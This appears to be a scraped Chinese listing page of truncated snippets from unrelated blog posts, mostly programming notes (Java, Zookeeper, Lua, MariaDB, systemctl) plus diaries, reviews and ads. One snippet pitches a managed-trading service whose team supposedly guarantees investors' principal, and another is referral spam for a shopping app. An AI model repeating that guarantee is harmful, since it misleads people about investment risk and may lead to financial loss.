直返的东西正品吗?直返APP安全吗?直返是正规平台吗? 氧惠购物达人
亲们，你们是不是经常在直返APP上买东西呀？但是，你们有没有想过，里面的东西到底是不是正品呢？这个APP安全吗？它是不是一个正规的平台呀？别着急，今天我就来给大家揭秘一下！氧惠APP（带货领导者）——是与以往完全不同的抖客+淘客app！2023全新模式，我的直推也会放到你下面。主打：带货高补贴，深受各位带货团队长喜爱（每天出单带货几十万单）。注册即可享受高补贴+0撸+捡漏等带货新体验。送万元推广大
【华为OD技术面试真题精选 - 非技术题】 -HR面，综合面_华为od hr面一个射手座的程序媛程序员华为od 面试职场和发展
最后的话最近很多小伙伴找我要Linux学习资料，于是我翻箱倒柜，整理了一些优质资源，涵盖视频、电子书、PPT等共享给大家！资料预览给大家整理的视频资料：给大家整理的电子书资料：如果本文对你有帮助，欢迎点赞、收藏、转发给朋友，让我有持续创作的动力！网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。需要这份系统化的资料的朋友，可以点击这里获
《大兴安岭猎人传说》今年最好看的东北鬼怪故事，很优秀一部电影
《大兴安岭猎人传说》是最新上映于愚人节的网剧，别看是网剧却远超出我的个人预料。该片由民俗故事改编，这点就很吸引人，因为民俗故事口口相传，比那些编造而成的鬼故事更具有了真实性，网大做的电影还不错哦，如果可以我打四星好评。大兴安岭的故事我们经常听老人提起，那里有原始大森林，物产丰富，更流传着精灵怪物的传说。什么红黄白柳灰，出马仙、人参娃娃的故事层出不穷，以大兴安岭为背景的故事真不少。可很多鬼片看到最后
《在战“疫”中成长致敬生活》观后感梅子刘的刀
（作者：周晨）今天上午，我看了“我是接班人”网络大课堂《在战役中成长致敬生活》。有很多人拿出自己攒下的钱，默默地捐给了武汉，有几千块钱的、有几万块钱的，也有十几万块钱的。连小朋友也把自己的压岁钱捐给了武汉。有名环卫工人把自己五年的积蓄全部捐给了武汉。有名外卖小哥为医护人员买鞋子送吃的。还有已经治愈出院的新型肺炎病人捐了400毫升的血浆。还有位叫大树的叔叔，虽然他没有钱，但是他地里有蔬菜，捐了几大卡
EIO国际确定性的交易（3/10）资管，资金委托安全吗？古城鹏哥
大家可能都知道资金托管，账户是自己开，钱在自己的账户上，密码是由自己掌控，别人提不走你账户的资金，每天可以看下到自己的账户，也可以看到交易流水。现金只能提到自己的银行卡中。账户由技术人员或操作人员，或者是机构团队帮你操作账户，产生盈利和收入，以获得的利润来分配盈利，技术强硬和做的时间久了过硬技术团队，会保证你的资金本金，不会让你的本金亏损的按照一定比例分配收入。所以在这个过程当中一定要看清楚技术的
简介Shell、zsh、bash zhaosuningsn Shell zsh bash shell linux bash
Shell是Linux和Unix的外壳，类似衣服，负责外界与Linux和Unix内核的交互联系。例如接收终端用户及各种应用程序的命令，把接收的命令翻译成内核能理解的语言，传递给内核，并把内核处理接收的命令的结果返回给外界，即Shell是外界和内核沟通的桥梁或大门。Linux和Unix提供了多种Shell，其中有种bash，当然还有其他好多种。Mac电脑中不但有bash，还有一个zsh，预装的，据说
Linux MariaDB使用OpenSSL安装SSL证书 Meta39 MySQL Oracle MariaDB Linux Windows ssl linux mariadb
进入到证书存放目录，批量删除.pem证书警告：确保已经进入到证书存放目录find.-typef-iname\*.pem-delete查看是否安装OpenSSLopensslversion没有则安装yuminstallopensslopenssl-devel开启SSL编辑/etc/my.cnf文件（没有的话就创建，但是要注意，在/etc/my.cnf.d/server.cnf配置了datadir的，
2018-12-07 旅一06丁琪琪
旅管一班6组学号链接06丁琪琪16家国鑫26孟令慧30王思宁36温红丽46朱赵筱楠
TDengine 签约前晨汽车，解锁智能出行的无限潜力涛思数据（TDengine） tdengine 汽车大数据
在全球汽车产业转型升级的背景下，智能网联和新能源技术正迅速成为商用车行业的重要发展方向。随着市场对环保和智能化需求的日益增强，企业必须在技术创新和数据管理上不断突破，以满足客户对高效、安全和智能出行的期待。在这一背景下，前晨汽车凭借其在新能源智能商用车领域的前瞻性布局和技术实力，成为行业中的佼佼者。前晨汽车采用整车数据采集和全车数据打通策略，能够实时将数据推送至APP端客户。然而，这导致整体写入和
中原焦点团队网络初中级30期阴丽丽坚持分享第三百八十八次2022.10.18分享约练次数（74）咨询师（6）来访者（53）观察者（15）阴丽丽
今天是忙碌的一天，一早起来，总想着找点把事情弄完，可总也弄不完。就这样弄着吧！孩子的事，自己的事都在那里搁置着，不想做，有点欧！今天总体还不错，只是在下午起床时走神了俩小时，也算是给自己的放松吧！今日难得1.儿子乖巧、听话，努力配合，一天下来也是忙忙碌碌，这真的很难得！2.儿子今天录的视频被班主任认可，这真的很难得3.我今天早上做核酸时，自己把教案整了一下，这真的很难得
“这才好”麻辣香锅能够增加人身体的免疫能力小补文知
我就来介绍一种香锅，那就是“这才好”麻辣香锅，它产出于著名的蜀地文化，具有悠久的历史土家风味，麻辣鲜香，健康安全。采用传统秘制麻辣香锅油辣子，还有贴心加料“孜然包”满足人们的不同口味需求，香锅底料辣椒，微辣且香，含有丰富微量元素和维生素，具有辣而不躁，味道纯正，醇厚温和。花椒采用历史悠久，被列为宫廷供品的“贡椒”的汉源花椒。我们还挑选了“川菜之魂”郫县豆瓣的鼻祖品牌豆瓣，保留最原始的郫县豆瓣味道，
网络编程基础记得开心一点啊网络
目录♫什么是网络编程♫Socket套接字♪什么是Socket套接字♪数据报套接字♪流套接字♫数据报套接字通信模型♪数据报套接字通讯模型♪DatagramSocket♪DatagramPacket♪实现UDP的服务端代码♪实现UDP的客户端代码♫流套接字通信模型♪流套接字通讯模型♪ServerSocket♪Socket♪实现TCP的服务端代码♪实现TCP的客户端代码♫什么是网络编程网络编程，指网络上
多线程编程之理财周凡杨 java 多线程生产者消费者理财
现实生活中，我们一边工作，一边消费，正常情况下会把多余的钱存起来，比如存到余额宝，还可以多挣点钱，现在就有这个情况：我每月可以发工资20000万元（暂定每月的1号），每月消费5000（租房+生活费）元（暂定每月的1号），其中租金是大头占90%，交房租的方式可以选择（一月一交，两月一交、三月一交），理财：1万元存余额宝一天可以赚1元钱，
[Zookeeper学习笔记之三]Zookeeper会话超时机制 bit1129 zookeeper
首先，会话超时是由Zookeeper服务端通知客户端会话已经超时，客户端不能自行决定会话已经超时，不过客户端可以通过调用Zookeeper.close()主动的发起会话结束请求，如下的代码输出内容 Created /zoo-739160015 CONNECTEDCONNECTED .............CONNECTEDCONNECTED CONNECTEDCLOSEDCLOSED
SecureCRT快捷键 daizj secureCRT 快捷键
ctrl + a : 移动光标到行首ctrl + e ：移动光标到行尾crtl + b: 光标前移1个字符crtl + f: 光标后移1个字符crtl + h : 删除光标之前的一个字符ctrl + d ：删除光标之后的一个字符crtl + k ：删除光标到行尾所有字符crtl + u : 删除光标至行首所有字符crtl + w: 删除光标至行首
Java 子类与父类这间的转换周凡杨 java 父类与子类的转换
最近同事调的一个服务报错，查看后是日期之间转换出的问题。代码里是把 java.sql.Date 类型的对象强制转换为 java.sql.Timestamp 类型的对象。报java.lang.ClassCastException。代码：
可视化swing界面编辑朱辉辉33 eclipse swing
今天发现了一个WindowBuilder插件，功能好强大，啊哈哈，从此告别手动编辑swing界面代码，直接像VB那样编辑界面，代码会自动生成。首先在Eclipse中点击help，选择Install New Software,然后在Work with中输入WindowBui
web报表工具FineReport常用函数的用法总结（文本函数）老A不折腾 finereport web报表工具报表软件 java报表
文本函数 CHAR CHAR(number):根据指定数字返回对应的字符。CHAR函数可将计算机其他类型的数字代码转换为字符。 Number:用于指定字符的数字，介于1Number:用于指定字符的数字，介于165535之间（包括1和65535）。示例: CHAR(88)等于“X”。 CHAR(45)等于“-”。 CODE CODE(text):计算文本串中第一个字
mysql安装出错林鹤霄 mysql安装
[root@localhost ~]# rpm -ivh MySQL-server-5.5.24-1.linux2.6.x86_64.rpm Preparing... #####################
linux下编译libuv aigo libuv
下载最新版本的libuv源码，解压后执行： ./autogen.sh 这时会提醒找不到automake命令，通过一下命令执行安装（redhat系用yum，Debian系用apt-get）： # yum -y install automake # yum -y install libtool 如果提示错误：make: *** No targe
中国行政区数据及三级联动菜单 alxw4616
近期做项目需要三级联动菜单,上网查了半天竟然没有发现一个能直接用的! 呵呵,都要自己填数据....我了个去这东西麻烦就麻烦的数据上. 哎,自己没办法动手写吧. 现将这些数据共享出了,以方便大家.嗯,代码也可以直接使用文件说明 lib\area.sql -- 县及县以上行政区划分代码（截止2013年8月31日)来源：国家统计局发布时间：2014-01-17 15:0
哈夫曼加密文件百合不是茶哈夫曼压缩哈夫曼加密二叉树
在上一篇介绍过哈夫曼编码的基础知识,下面就直接介绍使用哈夫曼编码怎么来做文件加密或者压缩与解压的软件,对于新手来是有点难度的,主要还是要理清楚步骤; 加密步骤: 1,统计文件中字节出现的次数,作为权值 2,创建节点和哈夫曼树 3,得到每个子节点01串 4,使用哈夫曼编码表示每个字节
JDK1.5 Cyclicbarrier实例 bijian1013 java thread java多线程 Cyclicbarrier
CyclicBarrier类一个同步辅助类，它允许一组线程互相等待，直到到达某个公共屏障点 (common barrier point)。在涉及一组固定大小的线程的程序中，这些线程必须不时地互相等待，此时 CyclicBarrier 很有用。因为该 barrier 在释放等待线程后可以重用，所以称它为循环的 barrier。 CyclicBarrier支持一个可选的 Runnable 命令，
九项重要的职业规划 bijian1013 工作学习
一. 学习的步伐不停止古人说，活到老，学到老。终身学习应该是您的座右铭。世界在不断变化，每个人都在寻找各自的事业途径。您只有保证了足够的技能储
【Java范型四】范型方法 bit1129 java
范型参数不仅仅可以用于类型的声明上，例如 package com.tom.lang.generics; import java.util.List; public class Generics<T> { private T value; public Generics(T value) { this.value =
【Hadoop十三】HDFS Java API基本操作 bit1129 hadoop
package com.examples.hadoop; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FSDataInputStream; import org.apache.hadoop.fs.FileStatus; import org.apache.hadoo
ua实现split字符串分隔 ronin47 lua split
LUA并不象其它许多"大而全"的语言那样，包括很多功能，比如网络通讯、图形界面等。但是LUA可以很容易地被扩展：由宿主语言(通常是C或 C++)提供这些功能，LUA可以使用它们，就像是本来就内置的功能一样。LUA只包括一个精简的核心和最基本的库。这使得LUA体积小、启动速度快，从而适合嵌入在别的程序里。因此在lua中并没有其他语言那样多的系统函数。习惯了其他语言的字符串分割函
java-从先序遍历和中序遍历重建二叉树 bylijinnan java
public class BuildTreePreOrderInOrder { /** * Build Binary Tree from PreOrder and InOrder * _______7______ / \ __10__ ___2 / \ / 4
openfire开发指南《连接和登陆》开窍的石头 openfire 开发指南 smack
第一步官网下载smack.jar包下载地址：http://www.igniterealtime.org/downloads/index.jsp#smack 第二步把smack里边的jar导入你新建的java项目中开始编写smack连接openfire代码 p
[移动通讯]手机后盖应该按需要能够随时开启 comsci 移动
看到新的手机，很多由金属材质做的外壳，内存和闪存容量越来越大，CPU速度越来越快，对于这些改进，我们非常高兴，也非常欢迎但是，对于手机的新设计，有几点我们也要注意第一：手机的后盖应该能够被用户自行取下来，手机的电池的可更换性应该是必须保留的设计,
20款国外知名的php开源cms系统 cuiyadll cms
内容管理系统，简称CMS，是一种简易的发布和管理新闻的程序。用户可以在后端管理系统中发布，编辑和删除文章，即使您不需要懂得HTML和其他脚本语言，这就是CMS的优点。在这里我决定介绍20款目前国外市面上最流行的开源的PHP内容管理系统，以便没有PHP知识的读者也可以通过国外内容管理系统建立自己的网站。 1. Wordpress WordPress的是一个功能强大且易于使用的内容管
Java生成全局唯一标识符 darrenzhu java uuid unique identifier id
How to generate a globally unique identifier in Java http://stackoverflow.com/questions/21536572/generate-unique-id-in-java-to-label-groups-of-related-entries-in-a-log http://stackoverflow
php安装模块检测是否已安装过, 使用的SQL语句 dcj3sjt126com sql
SHOW [FULL] TABLES [FROM db_name] [LIKE 'pattern'] SHOW TABLES列举了给定数据库中的非TEMPORARY表。您也可以使用mysqlshow db_name命令得到此清单。本命令也列举数据库中的其它视图。支持FULL修改符，这样SHOW FULL TABLES就可以显示第二个输出列。对于一个表，第二列的值为BASE T
5天学会一种 web 开发框架 dcj3sjt126com Web 框架 framework
web framework层出不穷，特别是ruby/python,各有10+个,php/java也是一大堆根据我自己的经验写了一个to do list,按照这个清单，一条一条的学习，事半功倍，很快就能掌握一共25条，即便很磨蹭，2小时也能搞定一条，25*2=50。只需要50小时就能掌握任意一种web框架各类web框架大同小异:现代web开发框架的6大元素，把握主线，就不会迷路建议把本文
Gson使用三(Map集合的处理,一对多处理) eksliang json gson Gson map Gson 集合处理
转载请出自出处：http://eksliang.iteye.com/blog/2175532 一、概述 Map保存的是键值对的形式，Json的格式也是键值对的，所以正常情况下，map跟json之间的转换应当是理所当然的事情。二、Map参考实例 package com.ickes.json; import java.lang.refl
cordova实现“再点击一次退出”效果 gundumw100 android
基本的写法如下： document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { //navigator.splashscreen.hide(); document.addEventListener("b
openldap configuration leaning note iwindyforest configuration
hostname // to display the computer name hostname <changed name> // to change go to: /etc/sysconfig/network, add/modify HOSTNAME=NEWNAME to change permenately dont forget to change /etc/hosts
Nullability and Objective-C 啸笑天 Objective-C
https://developer.apple.com/swift/blog/?id=25 http://www.cocoachina.com/ios/20150601/11989.html http://blog.csdn.net/zhangao0086/article/details/44409913 http://blog.sunnyxx
jsp中实现参数隐藏的两种方法 macroli JavaScript jsp
在一个JSP页面有一个链接，//确定是一个链接?点击弹出一个页面，需要传给这个页面一些参数。//正常的方法是设置弹出页面的src="***.do?p1=aaa&p2=bbb&p3=ccc"//确定目标URL是Action来处理?但是这样会在页面上看到传过来的参数，可能会不安全。要求实现src="***.do"，参数通过其他方法传！//////
Bootstrap A标签关闭modal并打开新的链接解决方案 qiaolevip 每天进步一点点学习永无止境 bootstrap 纵观千象
Bootstrap里面的js modal控件使用起来很方便，关闭也很简单。只需添加标签 data-dismiss="modal" 即可。可是偏偏有时候需要a标签既要关闭modal，有要打开新的链接，尝试多种方法未果。只好使用原始js来控制。 <a href="#/group-buy" class="btn bt
二维数组在Java和C中的区别流淚的芥末 java c 二维数组数组
Java代码： public class test03 { public static void main(String[] args) { int[][] a = {{1},{2,3},{4,5,6}}; System.out.println(a[0][1]); } } 运行结果： Exception in thread "mai
systemctl命令用法 wmlJava linux systemctl
对比表，以 apache / httpd 为例任务旧指令新指令使某服务自动启动 chkconfig --level 3 httpd on systemctl enable httpd.service 使某服务不自动启动 chkconfig --level 3 httpd off systemctl disable httpd.service 检查服务状态 service h